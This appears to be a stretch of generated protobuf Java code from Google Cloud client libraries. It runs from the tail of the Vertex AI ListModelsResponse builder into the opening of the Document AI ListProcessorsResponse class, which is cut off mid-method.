com.google.cloud.aiplatform.v1.ListModelsResponse build() { com.google.cloud.aiplatform.v1.ListModelsResponse result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.aiplatform.v1.ListModelsResponse buildPartial() { com.google.cloud.aiplatform.v1.ListModelsResponse result = new com.google.cloud.aiplatform.v1.ListModelsResponse(this); buildPartialRepeatedFields(result); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartialRepeatedFields( com.google.cloud.aiplatform.v1.ListModelsResponse result) { if (modelsBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0)) { models_ = java.util.Collections.unmodifiableList(models_); bitField0_ = (bitField0_ & ~0x00000001); } result.models_ = models_; } else { result.models_ = modelsBuilder_.build(); } } private void buildPartial0(com.google.cloud.aiplatform.v1.ListModelsResponse result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000002) != 0)) { result.nextPageToken_ = nextPageToken_; } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.aiplatform.v1.ListModelsResponse) { return mergeFrom((com.google.cloud.aiplatform.v1.ListModelsResponse) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloud.aiplatform.v1.ListModelsResponse other) { if (other == com.google.cloud.aiplatform.v1.ListModelsResponse.getDefaultInstance()) return this; if (modelsBuilder_ == null) { if (!other.models_.isEmpty()) { if (models_.isEmpty()) { models_ = other.models_; bitField0_ = (bitField0_ & ~0x00000001); } else { ensureModelsIsMutable(); models_.addAll(other.models_); } onChanged(); } } else { if (!other.models_.isEmpty()) { if (modelsBuilder_.isEmpty()) { modelsBuilder_.dispose(); modelsBuilder_ = null; models_ = other.models_; bitField0_ = (bitField0_ & ~0x00000001); modelsBuilder_ = com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders ? getModelsFieldBuilder() : null; } else { modelsBuilder_.addAllMessages(other.models_); } } } if (!other.getNextPageToken().isEmpty()) { nextPageToken_ = other.nextPageToken_; bitField0_ |= 0x00000002; onChanged(); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { com.google.cloud.aiplatform.v1.Model m = input.readMessage( com.google.cloud.aiplatform.v1.Model.parser(), extensionRegistry); if (modelsBuilder_ == null) { ensureModelsIsMutable(); models_.add(m); } else { modelsBuilder_.addMessage(m); } break; } // case 10 case 18: { nextPageToken_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000002; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.util.List<com.google.cloud.aiplatform.v1.Model> models_ = java.util.Collections.emptyList(); private void ensureModelsIsMutable() { if (!((bitField0_ & 0x00000001) != 0)) { models_ = new java.util.ArrayList<com.google.cloud.aiplatform.v1.Model>(models_); bitField0_ |= 0x00000001; } } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.aiplatform.v1.Model, com.google.cloud.aiplatform.v1.Model.Builder, com.google.cloud.aiplatform.v1.ModelOrBuilder> modelsBuilder_; /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public java.util.List<com.google.cloud.aiplatform.v1.Model> getModelsList() { if (modelsBuilder_ == null) { return java.util.Collections.unmodifiableList(models_); } else { return modelsBuilder_.getMessageList(); } } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public int getModelsCount() { if (modelsBuilder_ == null) { return models_.size(); } else { return modelsBuilder_.getCount(); } } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public com.google.cloud.aiplatform.v1.Model getModels(int index) { if (modelsBuilder_ == null) { return models_.get(index); } else { return modelsBuilder_.getMessage(index); } } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public Builder setModels(int index, com.google.cloud.aiplatform.v1.Model value) { if (modelsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureModelsIsMutable(); models_.set(index, value); onChanged(); } else { modelsBuilder_.setMessage(index, value); } return this; } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public Builder setModels( int index, com.google.cloud.aiplatform.v1.Model.Builder builderForValue) { if (modelsBuilder_ == null) { ensureModelsIsMutable(); models_.set(index, builderForValue.build()); onChanged(); } else { modelsBuilder_.setMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public Builder addModels(com.google.cloud.aiplatform.v1.Model value) { if (modelsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureModelsIsMutable(); models_.add(value); onChanged(); } else { modelsBuilder_.addMessage(value); } return this; } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public Builder addModels(int index, com.google.cloud.aiplatform.v1.Model value) { if (modelsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureModelsIsMutable(); models_.add(index, value); onChanged(); } else { modelsBuilder_.addMessage(index, value); } return this; } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public Builder addModels(com.google.cloud.aiplatform.v1.Model.Builder builderForValue) { if (modelsBuilder_ == null) { ensureModelsIsMutable(); models_.add(builderForValue.build()); onChanged(); } else { modelsBuilder_.addMessage(builderForValue.build()); } return this; } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public Builder addModels( int index, com.google.cloud.aiplatform.v1.Model.Builder builderForValue) { if (modelsBuilder_ == null) { ensureModelsIsMutable(); models_.add(index, builderForValue.build()); onChanged(); } else { modelsBuilder_.addMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public Builder addAllModels( java.lang.Iterable<? extends com.google.cloud.aiplatform.v1.Model> values) { if (modelsBuilder_ == null) { ensureModelsIsMutable(); com.google.protobuf.AbstractMessageLite.Builder.addAll(values, models_); onChanged(); } else { modelsBuilder_.addAllMessages(values); } return this; } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public Builder clearModels() { if (modelsBuilder_ == null) { models_ = java.util.Collections.emptyList(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); } else { modelsBuilder_.clear(); } return this; } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public Builder removeModels(int index) { if (modelsBuilder_ == null) { ensureModelsIsMutable(); models_.remove(index); onChanged(); } else { modelsBuilder_.remove(index); } return this; } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public com.google.cloud.aiplatform.v1.Model.Builder getModelsBuilder(int index) { return getModelsFieldBuilder().getBuilder(index); } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public com.google.cloud.aiplatform.v1.ModelOrBuilder getModelsOrBuilder(int index) { if (modelsBuilder_ == null) { return models_.get(index); } else { return modelsBuilder_.getMessageOrBuilder(index); } } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public java.util.List<? extends com.google.cloud.aiplatform.v1.ModelOrBuilder> getModelsOrBuilderList() { if (modelsBuilder_ != null) { return modelsBuilder_.getMessageOrBuilderList(); } else { return java.util.Collections.unmodifiableList(models_); } } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public com.google.cloud.aiplatform.v1.Model.Builder addModelsBuilder() { return getModelsFieldBuilder() .addBuilder(com.google.cloud.aiplatform.v1.Model.getDefaultInstance()); } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public com.google.cloud.aiplatform.v1.Model.Builder addModelsBuilder(int index) { return getModelsFieldBuilder() .addBuilder(index, com.google.cloud.aiplatform.v1.Model.getDefaultInstance()); } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ public java.util.List<com.google.cloud.aiplatform.v1.Model.Builder> getModelsBuilderList() { return getModelsFieldBuilder().getBuilderList(); } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.aiplatform.v1.Model, com.google.cloud.aiplatform.v1.Model.Builder, com.google.cloud.aiplatform.v1.ModelOrBuilder> getModelsFieldBuilder() { if (modelsBuilder_ == null) { modelsBuilder_ = new com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.aiplatform.v1.Model, com.google.cloud.aiplatform.v1.Model.Builder, com.google.cloud.aiplatform.v1.ModelOrBuilder>( models_, ((bitField0_ & 0x00000001) != 0), getParentForChildren(), isClean()); models_ = null; } return modelsBuilder_; } private java.lang.Object nextPageToken_ = ""; /** * * * <pre> * A token to retrieve next page of results. * Pass to * [ListModelsRequest.page_token][google.cloud.aiplatform.v1.ListModelsRequest.page_token] * to obtain that page. * </pre> * * <code>string next_page_token = 2;</code> * * @return The nextPageToken. */ public java.lang.String getNextPageToken() { java.lang.Object ref = nextPageToken_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); nextPageToken_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * A token to retrieve next page of results. * Pass to * [ListModelsRequest.page_token][google.cloud.aiplatform.v1.ListModelsRequest.page_token] * to obtain that page. * </pre> * * <code>string next_page_token = 2;</code> * * @return The bytes for nextPageToken. */ public com.google.protobuf.ByteString getNextPageTokenBytes() { java.lang.Object ref = nextPageToken_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); nextPageToken_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * A token to retrieve next page of results. * Pass to * [ListModelsRequest.page_token][google.cloud.aiplatform.v1.ListModelsRequest.page_token] * to obtain that page. * </pre> * * <code>string next_page_token = 2;</code> * * @param value The nextPageToken to set. * @return This builder for chaining. */ public Builder setNextPageToken(java.lang.String value) { if (value == null) { throw new NullPointerException(); } nextPageToken_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * A token to retrieve next page of results. * Pass to * [ListModelsRequest.page_token][google.cloud.aiplatform.v1.ListModelsRequest.page_token] * to obtain that page. * </pre> * * <code>string next_page_token = 2;</code> * * @return This builder for chaining. */ public Builder clearNextPageToken() { nextPageToken_ = getDefaultInstance().getNextPageToken(); bitField0_ = (bitField0_ & ~0x00000002); onChanged(); return this; } /** * * * <pre> * A token to retrieve next page of results. * Pass to * [ListModelsRequest.page_token][google.cloud.aiplatform.v1.ListModelsRequest.page_token] * to obtain that page. * </pre> * * <code>string next_page_token = 2;</code> * * @param value The bytes for nextPageToken to set. * @return This builder for chaining. */ public Builder setNextPageTokenBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); nextPageToken_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.aiplatform.v1.ListModelsResponse) } // @@protoc_insertion_point(class_scope:google.cloud.aiplatform.v1.ListModelsResponse) private static final com.google.cloud.aiplatform.v1.ListModelsResponse DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.aiplatform.v1.ListModelsResponse(); } public static com.google.cloud.aiplatform.v1.ListModelsResponse getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<ListModelsResponse> PARSER = new com.google.protobuf.AbstractParser<ListModelsResponse>() { @java.lang.Override public ListModelsResponse parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<ListModelsResponse> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<ListModelsResponse> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.aiplatform.v1.ListModelsResponse getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleapis/google-cloud-java
35,738
java-document-ai/proto-google-cloud-document-ai-v1/src/main/java/com/google/cloud/documentai/v1/ListProcessorsResponse.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/documentai/v1/document_processor_service.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.documentai.v1; /** * * * <pre> * Response message for the * [ListProcessors][google.cloud.documentai.v1.DocumentProcessorService.ListProcessors] * method. * </pre> * * Protobuf type {@code google.cloud.documentai.v1.ListProcessorsResponse} */ public final class ListProcessorsResponse extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.documentai.v1.ListProcessorsResponse) ListProcessorsResponseOrBuilder { private static final long serialVersionUID = 0L; // Use ListProcessorsResponse.newBuilder() to construct. private ListProcessorsResponse(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private ListProcessorsResponse() { processors_ = java.util.Collections.emptyList(); nextPageToken_ = ""; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new ListProcessorsResponse(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.documentai.v1.DocumentAiProcessorService .internal_static_google_cloud_documentai_v1_ListProcessorsResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.documentai.v1.DocumentAiProcessorService .internal_static_google_cloud_documentai_v1_ListProcessorsResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.documentai.v1.ListProcessorsResponse.class, com.google.cloud.documentai.v1.ListProcessorsResponse.Builder.class); } public static final int PROCESSORS_FIELD_NUMBER = 1; @SuppressWarnings("serial") private java.util.List<com.google.cloud.documentai.v1.Processor> processors_; /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ @java.lang.Override public java.util.List<com.google.cloud.documentai.v1.Processor> getProcessorsList() { return processors_; } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ @java.lang.Override public java.util.List<? extends com.google.cloud.documentai.v1.ProcessorOrBuilder> getProcessorsOrBuilderList() { return processors_; } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ @java.lang.Override public int getProcessorsCount() { return processors_.size(); } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ @java.lang.Override public com.google.cloud.documentai.v1.Processor getProcessors(int index) { return processors_.get(index); } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ @java.lang.Override public com.google.cloud.documentai.v1.ProcessorOrBuilder getProcessorsOrBuilder(int index) { return processors_.get(index); } public static final int NEXT_PAGE_TOKEN_FIELD_NUMBER = 2; @SuppressWarnings("serial") private volatile java.lang.Object nextPageToken_ = ""; /** * * * <pre> * Points to the next processor, otherwise empty. * </pre> * * <code>string next_page_token = 2;</code> * * @return The nextPageToken. */ @java.lang.Override public java.lang.String getNextPageToken() { java.lang.Object ref = nextPageToken_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); nextPageToken_ = s; return s; } } /** * * * <pre> * Points to the next processor, otherwise empty. * </pre> * * <code>string next_page_token = 2;</code> * * @return The bytes for nextPageToken. */ @java.lang.Override public com.google.protobuf.ByteString getNextPageTokenBytes() { java.lang.Object ref = nextPageToken_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); nextPageToken_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { for (int i = 0; i < processors_.size(); i++) { output.writeMessage(1, processors_.get(i)); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(nextPageToken_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, nextPageToken_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; for (int i = 0; i < processors_.size(); i++) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(1, processors_.get(i)); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(nextPageToken_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, nextPageToken_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.documentai.v1.ListProcessorsResponse)) { return super.equals(obj); } com.google.cloud.documentai.v1.ListProcessorsResponse other = (com.google.cloud.documentai.v1.ListProcessorsResponse) obj; if (!getProcessorsList().equals(other.getProcessorsList())) return false; if (!getNextPageToken().equals(other.getNextPageToken())) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (getProcessorsCount() > 0) { hash = (37 * hash) + PROCESSORS_FIELD_NUMBER; hash = (53 * hash) + getProcessorsList().hashCode(); } hash = (37 * hash) + NEXT_PAGE_TOKEN_FIELD_NUMBER; hash = (53 * hash) + getNextPageToken().hashCode(); hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.documentai.v1.ListProcessorsResponse parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.documentai.v1.ListProcessorsResponse parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.documentai.v1.ListProcessorsResponse parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.documentai.v1.ListProcessorsResponse parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.documentai.v1.ListProcessorsResponse parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.documentai.v1.ListProcessorsResponse parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.documentai.v1.ListProcessorsResponse parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.documentai.v1.ListProcessorsResponse parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.documentai.v1.ListProcessorsResponse parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.documentai.v1.ListProcessorsResponse parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.documentai.v1.ListProcessorsResponse parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.documentai.v1.ListProcessorsResponse parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.documentai.v1.ListProcessorsResponse prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Response message for the * [ListProcessors][google.cloud.documentai.v1.DocumentProcessorService.ListProcessors] * method. * </pre> * * Protobuf type {@code google.cloud.documentai.v1.ListProcessorsResponse} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.documentai.v1.ListProcessorsResponse) com.google.cloud.documentai.v1.ListProcessorsResponseOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.documentai.v1.DocumentAiProcessorService .internal_static_google_cloud_documentai_v1_ListProcessorsResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.documentai.v1.DocumentAiProcessorService .internal_static_google_cloud_documentai_v1_ListProcessorsResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.documentai.v1.ListProcessorsResponse.class, com.google.cloud.documentai.v1.ListProcessorsResponse.Builder.class); } // Construct using com.google.cloud.documentai.v1.ListProcessorsResponse.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; if (processorsBuilder_ == null) { processors_ = java.util.Collections.emptyList(); } else { processors_ = null; processorsBuilder_.clear(); } bitField0_ = (bitField0_ & ~0x00000001); nextPageToken_ = ""; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.documentai.v1.DocumentAiProcessorService .internal_static_google_cloud_documentai_v1_ListProcessorsResponse_descriptor; } @java.lang.Override public com.google.cloud.documentai.v1.ListProcessorsResponse getDefaultInstanceForType() { return com.google.cloud.documentai.v1.ListProcessorsResponse.getDefaultInstance(); } @java.lang.Override public com.google.cloud.documentai.v1.ListProcessorsResponse build() { com.google.cloud.documentai.v1.ListProcessorsResponse result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.documentai.v1.ListProcessorsResponse buildPartial() { com.google.cloud.documentai.v1.ListProcessorsResponse result = new com.google.cloud.documentai.v1.ListProcessorsResponse(this); buildPartialRepeatedFields(result); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartialRepeatedFields( com.google.cloud.documentai.v1.ListProcessorsResponse result) { if (processorsBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0)) { processors_ = java.util.Collections.unmodifiableList(processors_); bitField0_ = (bitField0_ & ~0x00000001); } result.processors_ = processors_; } else { result.processors_ = processorsBuilder_.build(); } } private void buildPartial0(com.google.cloud.documentai.v1.ListProcessorsResponse result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000002) != 0)) { result.nextPageToken_ = nextPageToken_; } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.documentai.v1.ListProcessorsResponse) { return mergeFrom((com.google.cloud.documentai.v1.ListProcessorsResponse) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloud.documentai.v1.ListProcessorsResponse other) { if (other == com.google.cloud.documentai.v1.ListProcessorsResponse.getDefaultInstance()) return this; if (processorsBuilder_ == null) { if (!other.processors_.isEmpty()) { if (processors_.isEmpty()) { processors_ = other.processors_; bitField0_ = (bitField0_ & ~0x00000001); } else { ensureProcessorsIsMutable(); processors_.addAll(other.processors_); } onChanged(); } } else { if (!other.processors_.isEmpty()) { if (processorsBuilder_.isEmpty()) { processorsBuilder_.dispose(); processorsBuilder_ = null; processors_ = other.processors_; bitField0_ = (bitField0_ & ~0x00000001); processorsBuilder_ = com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders ? getProcessorsFieldBuilder() : null; } else { processorsBuilder_.addAllMessages(other.processors_); } } } if (!other.getNextPageToken().isEmpty()) { nextPageToken_ = other.nextPageToken_; bitField0_ |= 0x00000002; onChanged(); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { com.google.cloud.documentai.v1.Processor m = input.readMessage( com.google.cloud.documentai.v1.Processor.parser(), extensionRegistry); if (processorsBuilder_ == null) { ensureProcessorsIsMutable(); processors_.add(m); } else { processorsBuilder_.addMessage(m); } break; } // case 10 case 18: { nextPageToken_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000002; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.util.List<com.google.cloud.documentai.v1.Processor> processors_ = java.util.Collections.emptyList(); private void ensureProcessorsIsMutable() { if (!((bitField0_ & 0x00000001) != 0)) { processors_ = new 